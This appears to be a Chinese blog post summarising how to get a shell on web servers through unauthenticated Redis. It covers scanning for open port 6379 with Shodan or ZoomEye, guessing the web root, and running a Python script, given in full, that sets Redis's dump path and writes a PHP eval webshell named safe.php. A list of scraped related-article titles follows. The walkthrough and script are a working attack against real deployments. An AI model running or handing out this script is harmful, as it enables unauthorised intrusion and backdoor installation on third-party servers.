Redis Getshell总结
Redis默认端口是6379,可以通过zoomeye或者shodan来查找开放6379的端口,能收到很多对外开放6379端口的ip,而且绝大部门是未授权访问的,因为默认redis是未授权访问。但是还有一先决条件是该ip开放web服务,也就是开放如常见的80端口等,满足这两个条件你就有可能getshell。但是还有最麻烦的一件事是,你必须要知道网站web路径。这边只能靠网站报错泄漏路径,phpinfo文件为删除,文件包含漏洞等,不然只能靠猜了,比如iis服务器的路径c:/inetpub/wwwroot等,linux服务器/var/www, /var/www/html等。
- 可以用redis-cli客户端连上redis服务器
- 然后可以用info验证是否有信息
- 通过设置路径,设置webshell名字和内容getshell
总结一下,redis getshell条件
- redis可以未授权访问,或者弱口令访问
- redis服务器还开放了web服务
- 知道web服务器的路径
以下还有一个redis getshell的脚本
#!/usr/bin/env python # coding=utf8
# author=Cy3ber http://www.cy3ber.com import redis
import sys def log(text):
print '[*]------' + text def getshell(ip='127.0.0.1', pt=6379, webdir='/var/www/', socket_timeout=10):
try:
r = redis.StrictRedis(host=ip, port=pt)
if r.config_set('dir', webdir) == True and r.config_set('dbfilename', 'safe.php')
== True:
log('set shell on %safe.php sucsessed' % (webdir))
else:
log('set shell dir failed')
sys.exit(1)
if r.set('myshell', "<?php @eval($_POST['sec']);?>") == True:
log('set eval sucsessed')
else:
log('set eval failed')
sys.exit(1)
if r.save() == True:
log('save shell as %safe.php sucsessed password is "sec"'%(webdir))
log('getshell sucsessed please check')
else:
log('getshell failed')
except:
log('error') if __name__ == '__main__':
if len(sys.argv) <> 4:
print "\n+-----------------------------+"
print "| JbossGetshell |"
print "| Cy3ber - cy3ber.com |"
print "| Email:webmaster@cy3ber.com |"
print "+-----------------------------+\n"
print 'Usage:python redisgetshell.py ip port webdir'
print "explame:python redisgetshell.py 10.0.18.1 6379 /data/web/"
sys.exit(1) else:
getshell(ip=sys.argv[1],pt=sys.argv[2],webdir=sys.argv[3])
Redis Getshell总结的更多相关文章
- 记一次Redis+Getshell经验分享
前言: 当我们接到一个授权渗透测试的时候,常规漏洞如注入.文件上传等尝试无果后,扫描端口可能会发现意外收获. 知己知彼乃百战不殆,Redis介绍: 简单来说 redis 就是一个Key-Value类型 ...
- SSRF漏洞分析与利用
转自:http://www.4o4notfound.org/index.php/archives/33/ 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 ...
- SSRF-php初探
0x00 前言 1) SSRF的概念很好理解,请自行百度. 2) JAVA/PHP/PYTHON都存在SSRF漏洞(至于其他语言的情况,了解粗浅尚不得知). 3) SSRF的利用方式 ...
- weblogic ssrf 漏洞笔记
CVE-2014-4210 Oracle WebLogic web server即可以被外部主机访问,同时也允许访问内部主机.比如有一个jsp页面SearchPublicReqistries.jsp, ...
- Pikachu靶场SSRF学习
下载Pikachu靶场:https://github.com/zhuifengshaonianhanlu/pikachu Windows用phpstudy也行,记得要改config.inc文件 打开S ...
- ATT&CK系列一 知识点总结
一.环境搭建1.环境搭建测试2.信息收集二.漏洞利用3.漏洞搜索与利用4.后台Getshell上传技巧5.系统信息收集6.主机密码收集三.内网搜集7.内网--继续信息收集8.内网攻击姿势--信息泄露9 ...
- redis未授权访问getshell
redis未授权访问的问题一年前就爆了,当时刚开始学安全,还不太懂.今天借着工作的机会来搞一把,看看能不能拿下一台服务器.其实前几天就写好了一直想找个实际环境复现一下,一直没有找到,只说下大致思路. ...
- Redis主从复制getshell技巧
Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell .写入启动项. Linux下,绝对路径写webshell .公私钥认证获取root权限 .利用contrab计划 ...
- redis未授权getshell的4种方式
前言 redis未授权漏洞或弱口令一直是很有用的渗透突破口,最近正好闲的无事就拿redis来测试一些,做一个简单的收集,方便自己日后的回顾. 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0 ...
随机推荐
- CentOS7 常用命令
常用命令 1.文件与目录操作 命令 解析 cd /home 进入 ‘/home’ 目录 cd .. 返回上一级目录 cd ../.. 返回上两级目录 cd - 返回上次所在目录 cp file1 fi ...
- Kubernetes监控实践
一.Kubernetes介绍 Kubernetes(K8s)是一个开源平台,能够有效简化应用管理.应用部署和应用扩展环节的手动操作流程,让用户更加灵活地部署管理云端应用. 作为可扩展的容错平台,K8s ...
- STL中nth_element的用法
nth_element函数原型有四个,详细我就不一一累赘了,我们就用最普通的用法寻找第k位置的元素. 函数用法为:nth_element(first,kth,end). first,last 第一个和 ...
- Redis 的底层数据结构(字典)
字典相对于数组,链表来说,是一种较高层次的数据结构,像我们的汉语字典一样,可以通过拼音或偏旁唯一确定一个汉字,在程序里我们管每一个映射关系叫做一个键值对,很多个键值对放在一起就构成了我们的字典结构. ...
- Mysql学习笔记整理之索引
索引的概念: 索引是一个分散存储的数据结构(检索)对数据库表中一列或多列的值进行排序 为什么要用索引? 索引能极大的减少存储引擎需要扫描的数据量 索引可以把随机IO变成顺序IO 索引可以帮助我们进行分 ...
- Mybatis逆向工程过程中出现targetRuntime in context mybatisGenerator is invalid
最开始设置的Mybatis,但是逆向工程准备就绪后出现问题 报错为targetRuntime in context mybatisGenerator is invalid 后来修改为Mybatis3能 ...
- 日志 logging 代码格式
日志logging 格式代码 import logging looger = logging.getLogger() #创建一个空架子 创建一个文件句柄,用来记录日志(文件流) fh = loggin ...
- SpringCloud搭建注册中心与服务注册
上一篇文章<微服务注册中心原理,看这篇就够了!>介绍了注册中心的概念和原理,本文将介绍下利用Eureka搭建中心并注册服务到注册中心的过程. 本文目录 一.Eureka介绍二.搭建注册中心 ...
- [技术栈]C#利用Luhn算法(模10算法)对IMEI校验
1.Luhn算法(模10算法) 通过查看ISO/IEC 7812-1:2017文件可以看到对于luhn算法的解释,如下图: 算法主要分为三步: 第一步:从右边第一位(最低位)开始隔位乘2: 第二步:把 ...
- Python基础(十六)
今日主要内容 内置模块(标准库) 序列化 hashlib collections 软件开发规范 一.内置模块(标准库) (一)序列化模块 什么是序列化? 将一种数据结构(如列表.字典)转换为另一种特殊 ...